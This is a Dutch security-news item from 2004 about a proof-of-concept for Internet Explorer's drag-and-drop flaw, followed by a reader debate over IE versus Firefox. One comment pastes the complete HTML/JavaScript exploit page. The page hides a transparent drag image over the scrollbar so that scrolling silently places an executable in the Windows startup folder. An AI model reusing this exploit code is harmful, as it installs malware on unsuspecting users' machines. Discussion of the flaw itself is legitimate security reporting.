image

Nieuw PoC laat gevaar van Internet Explorer lek zien

woensdag 25 augustus 2004, 13:46 door Redactie, 32 reacties

Het "Drag and Drop" lek dat onlangs in Internet Explorer ontdekt werd, is volgens Microsoft geen ernstig probleem, aangezien er interactie van de gebruiker vereist is om er misbruik van te maken. Om te laten zien waartoe het lek kan leiden maakte http-equiv een proof of concept (PoC), waarbij je een plaatje moest verslepen. Werd het plaatje in Internet Explorer versleept, dan werd het bestand malware.exe in de startup folder geplaatst. Aan de hand van deze proof of concept heeft mikx in 20 minuten een nieuwe variant gemaakt, die zowel het plaatje dat versleept moet worden, als de map waar het gedropt moet worden, verbergt. Hierdoor zal in zijn PoC het gebruik van de Windows scrollbar ertoe leiden dat er malware in de startup folder geplaatst wordt. Als bewijs heeft mikx deze pagina gemaakt, die meer informatie en het proof of concept bevat. Mikx laat tevens weten dat hij het PoC in slechts 20 minuten heeft gemaakt. Scriptkiddies met voldoende tijd kunnen dan ook andere manieren ontwikkelen om het lek in de nabije toekomst te misbruiken. (SecurityFocus)

Reacties (32)
25-08-2004, 14:52 door Anoniem
Hahaha... scrollen om de exploit te installeren.. het wordt
steeds mooier.

We hebben dus een browser die content uit de internet zone
automatisch als trusted beschouwd en een os dat automatisch
executables uitvoert.

Ik denk dat ik maar van Mac OS X en Safari ga migreren naar
Windows XP en IE... ik wil die features ook!
25-08-2004, 15:18 door Anoniem
Door Anoniem
Hahaha... scrollen om de exploit te installeren.. het wordt
steeds mooier.

We hebben dus een browser die content uit de internet zone
automatisch als trusted beschouwd en een os dat automatisch
executables uitvoert.

Ik denk dat ik maar van Mac OS X en Safari ga migreren naar
Windows XP en IE... ik wil die features ook!

Volgens mij snap je het niet helemaal.

Leuk, zo zijn er volgens mij veel meer mogelijk! maar Mikx blijft natuurlijk een
beetje een loser door die claim van "ik kan het in 20 minuten".
25-08-2004, 15:35 door Anoniem
maar Mikx blijft natuurlijk een
beetje een loser door die claim van "ik kan het in 20
minuten".

Waarom?

Omdat jij het niet kan?

Of...

Omdat jij in de veronderstelling bent dat hackers en
crackers heel erg slim moeten zijn om gaten in een operating
system te kunnen misbruiken?

Zoals Mikx duidelijk wil maken is het betrekkelijk eenvoudig
te exploiteren. Waarom is hij nu een loser? Ik snap je
opmerking nog steeds niet.
25-08-2004, 15:44 door Anoniem
Ik heb dit lek uitgeprobeerd (IE6 SP1 en alle patches) maar dit lek
functioneert niet. Dit komt doordat ik de schuifwaarden van de
beveiligingszones op HIGH heb gezet. Hierdoor is Active-scripting e.d.
uitgeschakeld.

Een patch is dus niet nodig, maar men moet de beveiligingszones van
IE beter gebruiken.
25-08-2004, 15:53 door Anoniem
Door Anoniem
Ik heb dit lek uitgeprobeerd (IE6 SP1 en alle patches) maar
dit lek
functioneert niet. Dit komt doordat ik de schuifwaarden van de
beveiligingszones op HIGH heb gezet. Hierdoor is
Active-scripting e.d.
uitgeschakeld.

Een patch is dus niet nodig, maar men moet de
beveiligingszones van
IE beter gebruiken.

Waarom al die vergeefse moeite doen voor die gatenkaas ?
Er zijn zoveel betere oplossingen die ook al ZO VAAK genoemd
zijn... zucht....
25-08-2004, 15:53 door Anoniem
Tja, maar het is wel een beetje belachelijk dat je tegenwoordig ook al moet
oppassen voor evil scrollbars.....
Microsoft had niet moeten vertellen dat dit lek niet gevaarlijk is (hoewel ik dit
niet heb kunnen terug vinden....), maar Mikx had scriptkiddies en malware
dudes niet moeten vertellen hoe je dit makkelijk kunt doen.
25-08-2004, 15:55 door Anoniem
Door Anoniem
Ik heb dit lek uitgeprobeerd (IE6 SP1 en alle patches) maar
dit lek
functioneert niet. Dit komt doordat ik de schuifwaarden van de
beveiligingszones op HIGH heb gezet. Hierdoor is
Active-scripting e.d.
uitgeschakeld.

Een patch is dus niet nodig, maar men moet de
beveiligingszones van
IE beter gebruiken.

Dan werkt het lek niet samen met zoveel andere websites.
Zoals gezegd gatenkaas kan je enkel opvullen en niet
repareren :)
25-08-2004, 16:02 door Anoniem
Tja, zo zullen er altijd lekken in veelgebruikte software gevonden worden.
25-08-2004, 16:12 door Anoniem
Door Anoniem
Tja, zo zullen er altijd lekken in veelgebruikte software
gevonden worden.

psies, tijd om over te stappen, al was het alleen al daarom.
25-08-2004, 16:16 door Anoniem
Firefox... is het antwoordt
nie zeuren gewoon die losse flodders van microschoft links
laten liggen !

;-)
25-08-2004, 16:18 door Anoniem
Door Anoniem
maar Mikx blijft natuurlijk een
beetje een loser door die claim van "ik kan het in 20
minuten".

Waarom?

Omdat jij het niet kan?

Of...

Omdat jij in de veronderstelling bent dat hackers en
crackers heel erg slim moeten zijn om gaten in een operating
system te kunnen misbruiken?

Zoals Mikx duidelijk wil maken is het betrekkelijk eenvoudig
te exploiteren. Waarom is hij nu een loser? Ik snap je
opmerking nog steeds niet.

Niets van dat alles (waar haal je het vandaan?).

Heel eenvoudige reden: Hoe lang hij er persoonlijk over deed heeft m.i. geen
toegevoegde waarde anders dan dat hij opschept hoe slim hij zelf wel niet is.
De eenvoud spreekt voldoende uit het voorbeeld zoals hij zelf aangeeft. De
20 minuten toevoeging is in mijn ogen puur een loser remark.

Dat doet verder niets af aan dit grappige voorbeeld. Er zullen er nog wel meer
volgen van dit soort nu.
25-08-2004, 16:22 door Anoniem
[quote[maar Mikx had scriptkiddies en malware
dudes niet moeten vertellen hoe je dit makkelijk kunt
doen.[/quote]Jawel hoor, uitbuiten die hap.
Ignorant people deserve to die :)
25-08-2004, 16:32 door Anoniem
Toch lijkt mij dit een van de ernstigste lekken in IE die in tijden
bekend zijn geworden. Geen mens zet het beveiligingsniveau van
IE (uitzonderingen daargelaten) op hoog.
Iemand al geprobeerd de pagina als HTML-email te versturen om
te zien of dat ook werkt ? Dat zou nl. helemaal fantastisch zijn.
25-08-2004, 16:39 door Anoniem
Door Anoniem
maar Mikx had scriptkiddies en malware
dudes niet moeten vertellen hoe je dit makkelijk kunt
doen.
Jawel hoor, uitbuiten die hap.
Ignorant people deserve to die :)
Das dus echt een reactie van een virusschrijver..... Spijtig dat er zulke domme
mensen zijn....
25-08-2004, 17:16 door Anoniem
Door Anoniem
Door Anoniem
Hahaha... scrollen om de exploit te installeren.. het wordt
steeds mooier.

We hebben dus een browser die content uit de internet zone
automatisch als trusted beschouwd en een os dat automatisch
executables uitvoert.

Ik denk dat ik maar van Mac OS X en Safari ga migreren naar
Windows XP en IE... ik wil die features ook!

Volgens mij snap je het niet helemaal.

Wat snap ik niet?

Ik wil ook lekken in mijn OS! Ik wil ook een onveilige
browser! Ik heb Apple al gemaild met de vraag minder aan
security te gaan doen en meer Microsoft marketing te
gebruiken... ik wil ook dagelijks moeten patchen!
25-08-2004, 17:17 door Dr.NO
Toch wel weer apart dat er een aantal IE aanhangers dit lek
geen lek vonden, maar gewoon niet zo fraai.

proven wrong once again.
25-08-2004, 17:35 door Anoniem
Door Dr.NO
Toch wel weer apart dat er een aantal IE aanhangers dit lek
geen lek vonden, maar gewoon niet zo fraai.

proven wrong once again.
que?

Volgens mij snap je niet waar het over gaat. Net alsof het nu ineens een lek
is. Er is niets anders aan dan voorheen; het blijft niet fraai en het is geen lek.
Voor de goede orde, ik ben geen IE aanhanger.

Software technisch is er niets fout; geen buffer overflow of functionaliteit die
buiten de bedoelde context werkt. Door (slim) te manipuleren is het mogelijk
mensen te foppen. Dit soort truuks zijn er wel meer en er is moeilijk aan te
ontkomen.

Hoe meer (grafische) functionaliteit je biedt, hoe meer van dit soort truuks
mogelijk zijn.
25-08-2004, 18:03 door Dr.NO
Net alsof het nu ineens een lek is.
dat was het eergister ook al. dat je dmv je scrollbalk
zomaar een executable in je startup folder kan krijgen, is
een vulnerability. een browser moet helemaal geen
executables in wat voor folder dan ook plaatsen zonder dat
duidelijk te vermelden. Doet ie dat wel ,dan issie lek.
Hoe meer (grafische) functionaliteit je biedt, hoe
meer van dit soort truuks
mogelijk zijn.
klopt, vooral als de code brak in mekaar zit.
25-08-2004, 18:05 door Anoniem
Door Anoniem
Software technisch is er niets fout; geen buffer overflow of
functionaliteit die
buiten de bedoelde context werkt. Door (slim) te manipuleren
is het mogelijk
mensen te foppen. Dit soort truuks zijn er wel meer en er is
moeilijk aan te
ontkomen.
Softwaretechnisch is er heel veel fout als je executable
content van een untrusted source blind uitvoert zonder dat
de gebruiker daar ook maar een melding van krijgt!
25-08-2004, 18:52 door Anoniem
Door Anoniem
Door Anoniem
Software technisch is er niets fout; geen buffer overflow of
functionaliteit die
buiten de bedoelde context werkt. Door (slim) te manipuleren
is het mogelijk
mensen te foppen. Dit soort truuks zijn er wel meer en er is
moeilijk aan te
ontkomen.
Softwaretechnisch is er heel veel fout als je executable
content van een untrusted source blind uitvoert zonder dat
de gebruiker daar ook maar een melding van krijgt!

Dat is dus niet wat hier gebeurd.


Je bent trouwens vrij om deze functionaliteit voor de Internet zone uit te
zetten, dat is misschien iets eenvoudiger dan Firefox te installeren die deze
functionaliteit niet heeft.
25-08-2004, 19:06 door Anoniem
Door Anoniem
Door Anoniem
Softwaretechnisch is er heel veel fout als je executable
content van een untrusted source blind uitvoert zonder dat
de gebruiker daar ook maar een melding van krijgt!
Dat is dus niet wat hier gebeurd.
[/quote] Waarom niet?
a) het gaat inderdaad om executable content
b) het komt inderdaad van een untrusted source
c) het gaat inderdaad blind, wat er vind geen controle meer plaats
op waar de content vandaan kwam
d) de code wordt inderdaad uitgevoerd de volgende keer dat
window opgestart wordt
e) en nee, de gebruiker krijgt geen melding van dit alles
Dus waarom denk je in vredesnaam dat dat niet is wat er gebeurd?


Je bent trouwens vrij om deze functionaliteit voor de Internet zone
uit te zetten, dat is misschien iets eenvoudiger dan Firefox te
installeren die deze functionaliteit niet heeft.
En daarmee schakel je ook functionaliteit uit die je nodig hebt om
veel sites goed te kunnen bekijken. En nee, Firefox heeft deze
functionaliteit inderdaad niet om de eenvoudige reden dat het 't niet
nodig heeft. Firefox is nooit ontworpen om ultieme controle over je
systeem uit te kunnen oefenen en is dus per definitie niet vatbaar
voor dit soort *lekken*.
25-08-2004, 19:24 door Anoniem
Door Anoniem
Door Anoniem
Door Anoniem
Softwaretechnisch is er heel veel fout als je executable
content van een untrusted source blind uitvoert zonder dat
de gebruiker daar ook maar een melding van krijgt!
Dat is dus niet wat hier gebeurd.
Waarom niet?
a) het gaat inderdaad om executable content
b) het komt inderdaad van een untrusted source
c) het gaat inderdaad blind, wat er vind geen controle meer plaats
op waar de content vandaan kwam
d) de code wordt inderdaad uitgevoerd de volgende keer dat
window opgestart wordt
e) en nee, de gebruiker krijgt geen melding van dit alles
Dus waarom denk je in vredesnaam dat dat niet is wat er gebeurd?


Je bent trouwens vrij om deze functionaliteit voor de Internet zone
uit te zetten, dat is misschien iets eenvoudiger dan Firefox te
installeren die deze functionaliteit niet heeft.
En daarmee schakel je ook functionaliteit uit die je nodig hebt om
veel sites goed te kunnen bekijken. En nee, Firefox heeft deze
functionaliteit inderdaad niet om de eenvoudige reden dat het 't niet
nodig heeft. Firefox is nooit ontworpen om ultieme controle over je
systeem uit te kunnen oefenen en is dus per definitie niet vatbaar
voor dit soort *lekken*. [/quote]
Je zei oorspronkelijk dat executable content blind wordt uitgevoerd, dat is niet
waar zoals ook blijkt uit je a t/m e toelichting. Door handelingen van de
gebruiker plaatst hij een executable in de startup folder. Hij ziet alleen niet
wat hij doet en dat is niet netjes.

Je kan de optie 'vragen' aanzetten voor de Internet zone en sites in de trusted
zone plaatsen.

Je hebt gelijk dat Firefox niet zo flexibel is, vandaar dat IE marktleider is en
blijft.
25-08-2004, 21:23 door Anoniem

Je zei oorspronkelijk dat executable content blind wordt uitgevoerd,
dat is niet waar zoals ook blijkt uit je a t/m e toelichting. Door
handelingen van de gebruiker plaatst hij een executable in de startup
folder. Hij ziet alleen niet wat hij doet en dat is niet netjes.
Kortom, de gebruiker ziet niet wat hij doet, maar dat noem je niet
blind uitvoeren. Ik denk echter dat de meeste mensen het er over
eens zullen zijn dat als je niets ziet dat je dan blind ben.


Je kan de optie 'vragen' aanzetten voor de Internet zone en sites in
de trusted zone plaatsen.

Je hebt gelijk dat Firefox niet zo flexibel is, vandaar dat IE marktleider
is en blijft.
Ik kan nou niet zeggen dat een browser waarbij ik moet aangeven
welke sites ik fatsoenlijk wil kunnen bekijken omdat ze anders niet
werken erg flexibel is eigenlijk. Maar goed, dat is waar onze wegen
scheiden denk ik dan.
25-08-2004, 23:36 door Anoniem
Door Anoniem
Door Anoniem
Door Anoniem
Firefox is nooit ontworpen om ultieme controle over je
systeem uit te kunnen oefenen en is dus per definitie niet vatbaar
voor dit soort *lekken*.

Dat valt nog maar te bezien... ;)
26-08-2004, 02:59 door Anoniem
Door Anoniem
Je bent trouwens vrij om deze functionaliteit voor de
Internet zone uit te
zetten, dat is misschien iets eenvoudiger dan Firefox te
installeren die deze
functionaliteit niet heeft.
Nee, maar als je Mozilla of Firefox installeert heb je
buiten dat je geen zorgen meer hoeft te maken over deze en
toekomstige problematische "functionaliteit" heb je
tenminste een browser die zich aan de normen houdt zoals
deze te vinden zijn aan het adres http://www.w3c.org/
26-08-2004, 03:02 door Anoniem
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Scrollbar Installer Version 1.1</title>
<style>
body {
margin:0px;
padding:0px;
overflow:hidden;
}

a {
behavior:url(#default#AnchorClick);
}
</style>
</head>

<body onSelectStart="return false;" onContextMenu="return
false;">

<img id="dyn" dynsrc="booom.exe" border="0"
style="filter:alpha(opacity=0);z-index:10;width:30px;height:100%;position:absolute;padding:
0px 0px 0px 0px;right:0px;top:0;" onDragStart="startDrag();"
onDragEnd="endDrag();" onClick="startClick()">

<div id="client"
style="z-index:2;visibility:hidden;width:5px;height:5px;overflow:hidden;position:absolute;top:0;left:0;">
<iframe name="clientframe" id="clientframe" marginwidth="0"
marginheight="0" scrolling="no" frameborder="0"
style="position:absolute;width:500px;height:500px;left:-400px;top:-400px;border:0px;"></iframe>
</div>

<a folder="shell:startup" target="clientframe"
id="clientcall" style="display:none"></a>

<iframe src="frame.html" name="root" id="root" width="100%"
height="100%" marginwidth="10" marginheight="10"
frameborder="0" style="z-index:1;"></iframe>

<script language="JavaScript" type="text/javascript">
var dragging = false;
var done = false;

document.body.onmouseover = function() {
follow(parseInt(event.clientX),parseInt(event.clientY))
}

document.body.ondragover = function () {
follow(parseInt(event.clientX),parseInt(event.clientY))
}

function follow(x,y) {
if (dragging && !done) {
document.getElementById("client").style.left = x-2+"px";
document.getElementById("client").style.top = y-2+"px";
scrollRoot(y);
}
}

function startDrag() {
dragging = true;
document.getElementById('client').style.visibility='visible';
return true;
}

function endDrag () {
dragging = false;
done = true;
document.getElementById('dyn').style.display='none';
document.getElementById('client').style.visibility='hidden';
}

function startClick() {
scrollRoot(parseInt(event.clientY))
return true;
}

function scrollRoot(y) {
// probably the dumbest scrollbar emulation on this planet ;)
frames["root"].scrollTo(0,(frames["root"].document.body.firstChild.offsetHeight/100*(y/document.getElementById("root").offsetHeight*100)));
}

document.getElementById("clientcall").click()
</script>

</body>
</html>
26-08-2004, 07:31 door Anoniem
Jammer he? dat dat niet werkt...
26-08-2004, 07:44 door Anoniem
Onvoorstelbaar dat er dus nog _steeds_ mensen zijn die, kosten wat kost, IE blijven
verdedigen. Een browser in ring 0 met tal van gaten. Een track record van patches en
prima alternatieven voor handen. Is dit nou masochisme ?
26-08-2004, 08:40 door Poele
Door Anoniem
Door Anoniem
maar Mikx blijft natuurlijk een
beetje een loser door die claim van "ik kan het in 20
minuten".

Waarom?

Omdat jij het niet kan?

Of...

Omdat jij in de veronderstelling bent dat hackers en
crackers heel erg slim moeten zijn om gaten in een operating
system te kunnen misbruiken?

Zoals Mikx duidelijk wil maken is het betrekkelijk eenvoudig
te exploiteren. Waarom is hij nu een loser? Ik snap je
opmerking nog steeds niet.

Niets van dat alles (waar haal je het vandaan?).

Heel eenvoudige reden: Hoe lang hij er persoonlijk over deed heeft m.i. geen
toegevoegde waarde anders dan dat hij opschept hoe slim hij zelf wel niet is.
De eenvoud spreekt voldoende uit het voorbeeld zoals hij zelf aangeeft. De
20 minuten toevoeging is in mijn ogen puur een loser remark.

Dat doet verder niets af aan dit grappige voorbeeld. Er zullen er nog wel meer
volgen van dit soort nu.

KuchuhKuchuh Bull shit.......

De korte tijd waarin iemand een exploit kan maken is wel degelijk een indicatie van de
ernst van een probleem. Ik sluit niet uit dat hij een loser is (ken hem verder niet, zeg
maar), maar dat zou ook een reden kunnen zijn voor het maken van de 20 minuten
claim.

trouwens, het is wellicht ook als loserig te beschouwen om iemand, zonder dat je
beschikt over al te veel achtergrondinformatie, als loser bestempeld. Maar dat weet ik
niet zeker, want ik ken je verder niet....
26-08-2004, 08:43 door Anoniem
Ontkenning + Masochisme = Vicieuze Cirkel
26-08-2004, 10:00 door Dr.NO
Ik kan nou niet zeggen dat een browser waarbij ik
moet aangeven
welke sites ik fatsoenlijk wil kunnen bekijken omdat ze
anders niet
werken erg flexibel is eigenlijk. Maar goed, dat is waar
onze wegen
scheiden denk ik dan.
Hear Hear!

Ik wil ook niet allemaal vage instellingen moeten gaan
instellen. ik wil gewoon, realitief secure kunnen surfen.

Firefox installeren is trouwens een stuk simpeler dan
security-zones uitvogelen.
26-08-2004, 12:54 door Anoniem
Door Anoniem
Ik heb dit lek uitgeprobeerd (IE6 SP1 en alle patches) maar dit lek
functioneert niet. Dit komt doordat ik de schuifwaarden van de
beveiligingszones op HIGH heb gezet. Hierdoor is Active-scripting e.d.
uitgeschakeld.

Een patch is dus niet nodig, maar men moet de beveiligingszones van
IE beter gebruiken.

Eens,

Alleen werken niet alle sites meer, dus wordt het toch weer aangepast naar een lager nivo.

Gewoon die rotzooi eruit en aan officiele standaarden houden.

Dan hebben we weer een aantal problemen minder.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.